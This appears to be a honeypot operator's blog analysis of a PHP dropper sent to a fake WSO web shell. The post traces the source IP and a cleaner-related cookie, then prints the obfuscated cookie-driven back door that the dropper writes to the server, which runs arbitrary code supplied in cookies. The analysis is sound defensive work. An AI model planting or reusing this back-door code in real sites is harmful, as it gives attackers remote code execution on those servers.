212.54.205.145-2018-01-25a

Back door executing out of HTTP cookies

Small piece of obscured PHP that executes functions named in HTTP cookies on PHP code also named in HTTP cookies. Very obscure.

Other people have discovered this code.

Origin

IP address 212.54.205.145

DNS did not have a name for 212.54.205.145, but whois lists a Greek network for it:

route:          212.54.192.0/19
descr:          FORTHNET
origin:         AS1241
mnt-by:         FORTHNETGR-MNT
created:        2001-12-05T16:14:19Z
last-modified:  2005-10-31T13:00:57Z

traceroute has packets going through te0-2-0.vll-kln-07.forthnet.gr, so I believe the whois data.

Download

Downloaded to a fake WSO web shell I've thoughtfully provided with my WordPress honey pot. PHP dropper code sent to the "RC" action of WSO, which is smart. WSO's "RC" action just eval's any PHP that arrives in a POST variable named "p1", the downloaded doesn't have to muck around with surrounding HTML as when invoking the "Php" action.

p0f3 thinks the downloading IP address runs Linux 2.6.x.

This did arrive with a cookie that has name and value of "227e948fdbaaeccbbb7b3f42fbe848e8". This is "www.stratigery.com" hashed according to an algorithm used by the Vigilante Malware Cleaner. That cleaner installs code in WSO instances that essentially provide an extra layer of password protection. This cookie is (a) further evidence the attackers thought they were accessing a WSO web cell, and (b) that the attackers are somehow related to, on in contact with, the Vigilance Committee.

Decoding

1. Hand edit 212.54.205.145Wmk0bnfUh61dvtcSreRhgQAAAAA.php.file into `dc1.php1
2. Invoke php dc1.php > dc2.php

Analysis

The PHP dropper code finds a writeable directory somewhere under the web server's DocumentRoot directory, creates a file name with random lower-case english letters like "fksornju.php" or "jpehbzly.php", then writes PHP code for a back door into the file so named.

Fairly clever back door:

<?php
  
$erz=$_COOKIE;
$edqg=$erz[gslp];
if($edqg){
    $upu=$edqg($erz[tusx]);$qwdq=$edqg($erz[gxfe]);$zlat=$upu("",$qwdq);$zlat();
}

If the HTTP cookie sent with the back door HTTP access has values named "gslp", "tusx" and "gxfe", this back door can decode some encoded-PHP that also arrives in the cookie, run it as the body of a function also named in the cookie, and then run another function, astonishingly named in the cookie.

The back door is strictly speaking, not decipherable until someone sends a cookie with those names and values in it. But so what? It's obviously running code that comes in a HTTP cookie that anyone could send.

Is concealing code in HTTP cookies the new black?